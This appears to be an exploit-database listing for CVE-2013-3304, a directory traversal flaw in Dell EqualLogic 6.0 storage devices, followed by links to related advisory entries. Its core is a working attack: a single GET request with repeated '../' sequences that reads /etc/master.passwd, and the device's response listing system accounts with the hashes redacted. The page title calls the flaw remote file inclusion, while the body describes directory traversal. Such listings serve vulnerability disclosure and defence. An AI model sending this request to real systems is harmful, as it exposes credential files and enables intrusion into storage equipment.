Lucene search
Mauricio Correa1337DAY-ID-22792HistoryOct 26, 2014 - 12:00 a.m.
Dell EqualLogic Storage - Remote File Inclusion Vulnerability
2014-10-2600:00:00
Mauricio Correa
0day.today
45
0.067 Low
EPSS
Percentile
93.8%
Exploit for hardware platform in category web applications
# Exploit Title: Remote Directory Traversal exploit for Dell EqualLogic 6.0
Storage
# Date: 09/2013
# Exploit Author: Mauricio Pampim CorrοΏ½a
# Vendor Homepage: www.dell.com
# Version: 6.0
# Tested on: Equipment Model Dell EqualLogic PS4000
# CVE : CVE-2013-3304
The malicious user sends
GET //../../../../../../../../etc/master.passwd
And the Dell Storage answers
root:[hash] &:/root:/bin/sh
daemon:*:[hash]::0:0:The devil himself:/:/sbin/nologin
operator:*:[hash]::0:0:System &:/usr/guest/operator:/sbin/nologin
bin:*:[hash]::0:0:Binaries Commands and Source:/:/sbin/nologin
sshd:*:[hash]:0:0:SSH pseudo-user:/var/chroot/sshd:/sbin/nologin
uucp:*:[hash]:UNIX-to-UNIX
Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
nobody:*:[hash]:Unprivileged user:/nonexistent:/sbin/nologin
grpadmin:[hash]:Group Manager Admin Account:/mgtdb/update:/usr/bin/Cli
authgroup:[hash]:Group Authenication Account:/:/sbin/nologin
# 0day.today [2018-03-01] #Related
seebug
seebug
Dell EqualLogic Storage - Directory Traversal
2014-11-13 00:00:00
openvas
openvas
Dell EqualLogic Directory Traversal Vulnerability
2014-10-29 00:00:00
exploitpack
exploitpack
Dell EqualLogic Storage - Directory Traversal
2014-10-25 00:00:00
cve
cve
CVE-2013-3304
2014-10-30 14:55:06
nvd
nvd
CVE-2013-3304
2014-10-30 14:55:06
prion
prion
Directory traversal
2014-10-30 14:55:00
cvelist
cvelist
CVE-2013-3304
2014-10-30 14:00:00
exploitdb
exploitdb
Dell EqualLogic Storage - Directory Traversal
2014-10-25 00:00:00